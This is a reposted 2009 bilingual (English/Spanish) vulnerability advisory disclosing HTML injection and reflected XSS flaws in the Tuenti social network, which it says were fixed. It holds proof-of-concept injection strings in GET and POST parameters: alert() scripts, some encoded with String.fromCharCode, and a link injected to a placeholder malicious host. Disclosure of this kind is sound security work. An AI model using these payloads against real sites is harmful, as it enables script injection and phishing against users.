Уведомление о безопасности: MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
  MULTIPLE SQL INJECTION VULNERABILITIES --Shutter v-0.1.1-->

From: y3nh4ck3r_(at)_gmail.com <y3nh4ck3r_(at)_gmail.com>
Date: 15 мая 2009 г.
Subject: MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->

####################
Language: English
####################

------------------------------------------------------------
MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->
------------------------------------------------------------

SYSTEM INFORMATION:

-->WEB: http://www.tuenti.com/
-->DOWNLOAD: No there.
-->DEMO: N/A
-->CATEGORY: Social Networking
-->DESCRIPTION: Tuenti is the biggest and most popular social network in Spain.

SYSTEM VULNERABILITY:

-->TESTED ON: firefox 3 and Internet Explorer 6.0
-->CATEGORY: HTML CODE INJECTION / XSS
-->Discovered Bug date: 2009-05-04
-->Reported Bug date: 2009-05-04
-->Fixed bug date: 2009-05-12
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Xikitiya no me odies por esto jajaja

#################
/////////////////

HTML INJECTION:

/////////////////
#################

Go to --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos

Vuln GET var --> 'cat_id'

Note: Here was not possible a XSS attack

------------------
PROOF OF CONCEPT:
------------------

http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos">
<A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>

Return --> New link on footer

#############################
/////////////////////////////

CROSS SITE SCRIPTING (XSS):

/////////////////////////////
#############################

<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Be friends (victim/attacker) +++++++++++++++++--------->>>>

Go to --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-646
99031

Vuln GET var --> 'items'

------------------
PROOF OF CONCEPT:
------------------

http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-646
99031"><script>alert('y3nh4ck3r was here')</script>

Return --> Alert message

<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>>

Go to --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload

Vuln GET var --> 'cat_id'

------------------
PROOF OF CONCEPT:
------------------

http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><
script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,
119,97,115,32,104,101,114,101,33))</script>

Return --> Alert message

<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>>

Go to --> http://www.tuenti.com/?need_invite=1

Vuln POST var --> 'email'

------------------
PROOF OF CONCEPT:
------------------

email="><script>alert(String.fromCharCode(121,51,110,104,
52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>

Return --> Alert message

----------------
FINAL REMARK:
----------------

Staff's members have fixed successfully these vulnerabilites ;)

####################
Language: Spanish
####################

----------------------------------------------------------------------
MЪLTIPLES VULNERABILIDADES DE INYECCIУN DE CУDIGO --TUENTI--ESPAСA->
----------------------------------------------------------------------

INFORMACIУN DEL SISTEMA:

-->WEB: http://www.tuenti.com/
-->DESCARGA: No hay
-->DEMO: No disponible
-->CATEGORНA: Red social
-->DESCRIPCIУN: Tuenti es la mayor y mбs popular red social en Espaсa.

VULNERABILIDAD DEL SISTEMA:

-->PROBADO EN: firefox 3 y Internet Explorer 6.0
-->CATEGORНA: INYECCIУN DE CУDIGO HTML/ XSS.
-->Fecha de descubrimiento del bug: 2009-05-04
-->Fecha de aviso al sistema: 2009-05-04
-->Fecha de fijaciуn del bug: 2009-05-12
-->Autor: YEnH4ckEr
-->Correo: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: No disponible
-->Comentario: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->Comentario-extra: Xikitiya no me odies por esto jajaja

#################
/////////////////

INYECCIУN HTML:

/////////////////
#################

Ir a --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos

Variable GET vulnerable --> 'cat_id'

Nota: Aquн no fue posible un ataque XSS

-------------------
PRUEBA DE CONCEPTO:
-------------------

http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos">
<A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>

Devuelve --> Nuevo enlace en el pie de pбgina

#############################
/////////////////////////////

CROSS SITE SCRIPTING (XSS):

/////////////////////////////
#############################

<<<<---------++++++++++++++ Condiciуn: Ser usuario registrado +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condiciуn-extra: Ser amigos (vнctima/atacante) +++++++++++++++++--------->>>>

Ir a --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-646
99031

Variable GET vulnerable --> 'items'

-------------------
PRUEBA DE CONCEPTO:
-------------------

http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-646
99031"><script>alert('y3nh4ck3r was here')</script>

Devuelve --> Mensaje de alerta

<<<<---------++++++++++++++ Condiciуn: Ser usuario registrado +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condiciуn-extra: Nada +++++++++++++++++--------->>>>

Ir a --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload

Variable GET vulnerable --> 'cat_id'

-------------------
PRUEBA DE CONCEPTO:
-------------------

http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><
script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,
119,97,115,32,104,101,114,101,33))</script>

Devuelve --> Mensaje de alerta

<<<<---------++++++++++++++ Condiciуn: Nada +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condiciуn-extra: Nada +++++++++++++++++--------->>>>

Ir a --> http://www.tuenti.com/?need_invite=1

Variable POST vulnerable --> 'email'

-------------------
PRUEBA DE CONCEPTO:
-------------------

email="><script>alert(String.fromCharCode(121,51,110,104,
52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>

Devuelve --> Mensaje de alerta

-------------------
OBSERVACIУN FINAL:
-------------------

El equipo de trabajo ha fijado con йxito estas vulnerabilidades ;)

#######################################################################
#######################################################################
##*******************************************************************##
##      SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ...     ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################

test server